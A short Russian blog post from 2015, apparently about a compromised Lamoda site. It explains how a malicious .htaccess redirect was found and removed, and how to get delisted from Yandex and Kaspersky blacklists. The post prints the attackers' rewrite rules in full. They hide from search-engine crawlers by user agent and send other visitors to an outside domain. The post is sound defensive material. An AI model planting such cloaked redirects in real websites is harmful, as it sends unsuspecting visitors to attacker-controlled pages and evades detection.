Как продает товары интернет-магазин Ламода
29 марта 2015
29 марта 2015
В поиске Яндекса этому сайту стала приписываться вот такая надпись:
При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.
Вот такой код залили злоумышленники в файлик .htaccess на хостинге:
RewriteCond %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer) [NC]
RewriteRule (.*) http://onlineg4.net/u/9024 [L,R=302]
Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.
Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.
Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:
Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
29 марта 2015
Один раз в месяц помимо ссылок на заметки делюсь жизнеными наблюдениями
— никакого спама и всегда можно отписаться